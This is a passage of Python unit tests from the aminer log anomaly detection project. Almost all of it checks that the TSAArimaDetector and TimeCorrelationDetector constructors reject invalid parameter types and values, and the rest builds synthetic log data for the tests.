self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=20) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=1.1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=0) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=0.5) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, acf_threshold=1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=1.1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=0) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=0.5) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, round_time_interval_threshold=1) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=None) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=b"True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length="True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=True) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=100) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=100.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, min_log_lines_per_time_step=100) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=None) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=True) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="Default") self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[""]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list="") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=True) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123.3) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[]) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=None) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=[""]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list="") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=True) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123.3) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=[]) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=None) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=None) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=b"True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline="True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=True) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=b"True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode="True") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list="") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=True) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123.22) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=()) self.assertRaises(TypeError, TSAArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=set()) TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["file:///tmp/syslog"]) @classmethod def setUpClass(cls): """Set up the data for the all tests.""" cls.alphabet = b"abcdefghijklmnopqrstuvwxyz" cls.analysis = "Analysis.%s" children = [] for _, val in enumerate(cls.alphabet): char = bytes([val]) children.append(DummyFixedDataModelElement("value", char)) cls.alphabet_model = DummyFirstMatchModelElement("first", children) cls.data = cls.generate_data(cls, 10000, 1) set_random_seed(42) def run_tad_test(self, tad, etd, log_atoms): """Run the ECD test.""" for log_atom in log_atoms: etd.receive_atom(log_atom) tad.receive_atom(log_atom) self.assertTrue(tad.arima_models) def generate_data(self, iterations, diff): """Generate data without any error.""" log_atoms = [] t = time.time() for i in range(1, iterations+1): char = bytes([self.alphabet[i % len(self.alphabet)]]) t += diff num = str(random.uniform(0, 1000)).encode() m1 = MatchElement("/model/id", num, num, None) m2 = MatchElement("/model/value", char, char, None) log_atoms.append(LogAtom(num + char, ParserMatch(MatchElement("/model", num + char, num + char, [m1, m2])), t + 1, None)) return log_atoms if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/TimeCorrelationDetectorTest.py000066400000000000000000000460161500476301700316160ustar00rootroot00000000000000import unittest from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyNumberModelElement, DummyFirstMatchModelElement from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector import time import random from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from datetime import datetime class TimeCorrelationDetectorTest(TestBase): """Unittests for the TimeCorrlelationDetectorTest.""" match_context1 = DummyMatchContext(b" pid=") fdme1 = DummyFixedDataModelElement("s1", b" pid=") match_element1 = fdme1.get_match_element("", match_context1) match_context2 = DummyMatchContext(b"25537 uid=2") fdme2 = DummyFixedDataModelElement("d1", b"25537") match_element2 = fdme2.get_match_element("", match_context2) def test1receive_atom(self): """Test if log atoms are processed correctly and new rules are created.""" expected_string = '%s Correlation report\nTimeCorrelationDetector: "None" (%d lines)\n ' dtf = "%Y-%m-%d %H:%M:%S" t = time.time() string = b"ddd 25537 uid=2" fdme = DummyFixedDataModelElement("s1", string) nme = DummyNumberModelElement("d1") fmme = DummyFirstMatchModelElement("f1", [fdme, nme]) # test different parallel_check_count values record_count = 70 record_count_path = 100 record_count_value = 50 for i in [1, 2, 10]: tcd = TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], i, record_count_before_event=record_count, max_rule_attributes=1) tcd_path = TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], i, record_count_before_event=record_count_path, use_path_match=True, use_value_match=False, max_rule_attributes=5) tcd_value = TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], i, record_count_before_event=record_count_value, use_path_match=False, use_value_match=True, max_rule_attributes=15) for j in range(1, 201): pos = random.randint(0, 1) data = [string, b"%d" % j][pos] match_context = DummyMatchContext(data) match_element = fmme.get_match_element("first", match_context) log_atom = LogAtom(data, ParserMatch(match_element), t, tcd) self.assertTrue(tcd.receive_atom(log_atom)) if j != 0 and j % record_count == 0: self.assertTrue(self.output_stream.getvalue().startswith(expected_string % (datetime.fromtimestamp(t).strftime(dtf), j))) self.assertEqual(self.output_stream.getvalue().count("\n"), i*(i+1)+4) self.reset_output_stream() self.assertTrue(tcd_path.receive_atom(log_atom)) if j != 0 and j % record_count_path == 0: self.assertFalse("value" in self.output_stream.getvalue()) self.reset_output_stream() self.assertTrue(tcd_value.receive_atom(log_atom)) if j != 0 and j % record_count_value == 0: self.assertFalse("hasPath" in self.output_stream.getvalue()) self.reset_output_stream() else: self.assertEqual(self.output_stream.getvalue(), "") def test2validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, ["default"], 2) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, None, 2) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, "", 2) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, b"Default", 2) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, True, 2) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, 123, 2) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, 123.3, 2) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, {"id": "Default"}, 2) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, (), 2) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, set(), 2) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 0) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], -1) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ["default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], set()) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id="") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=None) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=123) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=123.22) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=["Default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=[]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, persistence_id="Default") self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=0) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=-1) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=["default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=None) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event="") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=123.3) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, record_count_before_event=2) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=None) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=b"True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline="True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=123) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=123.22) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=["Default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=[]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, output_logline=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=b"True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match="True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=123) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=123.22) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=["Default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=[]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, use_path_match=True) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=False, use_path_match=False) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=b"True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match="True") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=123) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=123.22) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=["Default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=[]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, use_value_match=True) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=0) 